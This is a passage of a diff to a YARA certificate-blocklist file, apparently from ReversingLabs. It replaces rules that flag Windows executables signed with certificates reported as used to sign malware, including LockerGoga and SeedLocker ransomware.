"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2824-L2840" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952" score = 75 quality = 90 tags = "INFO, FILE" @@ -12587,22 +32378,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PARTYNET LIMITED" and pe.signatures[i].serial=="1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cigam Software Corporativo LTDA" and pe.signatures[i].serial=="03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "549a566b-0c94-516c-9231-a5e54136785f" + id = "eb6ccc6d-2a66-5113-8b78-c32012431123" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8824-L8840" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2842-L2860" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9" score = 75 quality = 90 tags = "INFO, FILE" @@ -12612,22 +32403,22 @@ rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ts Trade ApS" and pe.signatures[i].serial=="2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Remedica Medical Education and Publishing Ltd" and (pe.signatures[i].serial=="00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures[i].serial=="bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50") and 1387151999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1e5f0577-ba05-5e43-a817-c75f65547c3d" + id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8842-L8860" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2862-L2878" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a" score = 75 quality = 90 tags = "INFO, FILE" @@ -12637,22 +32428,22 @@ rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "U.K. STEEL EXPORTS LIMITED" and (pe.signatures[i].serial=="00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures[i].serial=="ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33") and 1616630400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "John W.Richard" and pe.signatures[i].serial=="3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4" + id = "c82170a4-911c-5206-bae8-6503a5449df9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8862-L8880" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2880-L2896" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6" score = 75 quality = 90 tags = "INFO, FILE" @@ -12662,22 +32453,22 @@ rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Software Two Pty Ltd" and (pe.signatures[i].serial=="00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures[i].serial=="c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a") and 1615334400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures[i].serial=="4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "83a5e5c2-0932-526b-80aa-800b37088bbd" + id = "8d9b0b1c-df7c-560a-8d51-bc8738952457" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8882-L8900" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2898-L2914" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2" score = 75 quality = 90 tags = "INFO, FILE" @@ -12687,22 +32478,22 @@ rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NAILS UNLIMITED LIMITED" and (pe.signatures[i].serial=="00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures[i].serial=="c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b") and 1616976000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3rd Eye Solutions Ltd" and pe.signatures[i].serial=="14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3387f396-01f7-58b1-a5bd-b308105c66d6" + id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8902-L8920" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2916-L2932" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7" score = 75 quality = 90 tags = "INFO, FILE" @@ -12712,22 +32503,22 @@ rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PIK MOTEL S.R.L." and (pe.signatures[i].serial=="00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures[i].serial=="e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85") and 1621468800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Reiner Wodey Informationssysteme" and pe.signatures[i].serial=="77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "016ad027-bd6a-58e0-9099-341b81dd6f70" + id = "8de9bcf3-d705-590f-8898-52218f937571" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8922-L8940" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2934-L2950" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746" score = 75 quality = 90 tags = "INFO, FILE" @@ -12737,22 +32528,22 @@ rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YAN CHING LIMITED" and (pe.signatures[i].serial=="00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures[i].serial=="af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c") and 1622419200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F3D LIMITED" and pe.signatures[i].serial=="4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing LockerGoga ransomware." author = "ReversingLabs" - id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055" + id = "0514759c-2d10-5b29-aa2f-d16eb45b2816" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8942-L8960" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2952-L2968" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b" score = 75 quality = 90 tags = "INFO, FILE" @@ -12762,22 +32553,22 @@ rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BOOK CAF\\xC3\\x89, s.r.o." and (pe.signatures[i].serial=="00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures[i].serial=="8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d") and 1620000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MIKL LIMITED" and pe.signatures[i].serial=="3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing BabyShark malware." author = "ReversingLabs" - id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be" + id = "25a4c68b-5774-51a2-9aba-1326c85a5251" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8962-L8980" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2970-L2986" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af" score = 75 quality = 90 tags = "INFO, FILE" @@ -12787,22 +32578,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade Hunters, s. r. o." and (pe.signatures[i].serial=="00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures[i].serial=="fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f") and 1620000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EGIS Co., Ltd." and pe.signatures[i].serial=="0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing SeedLocker ransomware." author = "ReversingLabs" - id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212" + id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8982-L9000" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2988-L3006" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a" score = 75 quality = 90 tags = "INFO, FILE" @@ -12812,22 +32603,22 @@ rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IPM Skupina d.o.o." and (pe.signatures[i].serial=="00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures[i].serial=="84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67") and 1621382400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Project NSRM Ltd" and (pe.signatures[i].serial=="00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures[i].serial=="83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7") and 1549830060<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5dba4570-51d8-5c23-85a5-5de9a048793f" + id = "421425b1-13ad-5d80-b044-8bd43c60b3ff" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9002-L9018" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3008-L3024" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b" score = 75 quality = 90 tags = "INFO, FILE" @@ -12837,22 +32628,22 @@ rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Activ Expeditions ApS" and pe.signatures[i].serial=="09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALINA LTD" and pe.signatures[i].serial=="09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8828c863-2800-5f66-968e-96a41a071218" + id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9020-L9036" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3026-L3042" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4" score = 75 quality = 90 tags = "INFO, FILE" @@ -12862,22 +32653,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Diamartis" and pe.signatures[i].serial=="7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DUHANEY LIMITED" and pe.signatures[i].serial=="4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53" + id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9038-L9056" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3044-L3060" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141" score = 75 quality = 90 tags = "INFO, FILE" @@ -12887,22 +32678,22 @@ rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Amcert LLC" and (pe.signatures[i].serial=="00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures[i].serial=="a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5") and 1623628800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d" + id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9058-L9074" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3062-L3080" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46" score = 75 quality = 90 tags = "INFO, FILE" @@ -12912,22 +32703,22 @@ rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTH PROPERTY LTD" and pe.signatures[i].serial=="37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FIRNEEZ EUROPE LIMITED" and (pe.signatures[i].serial=="00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or 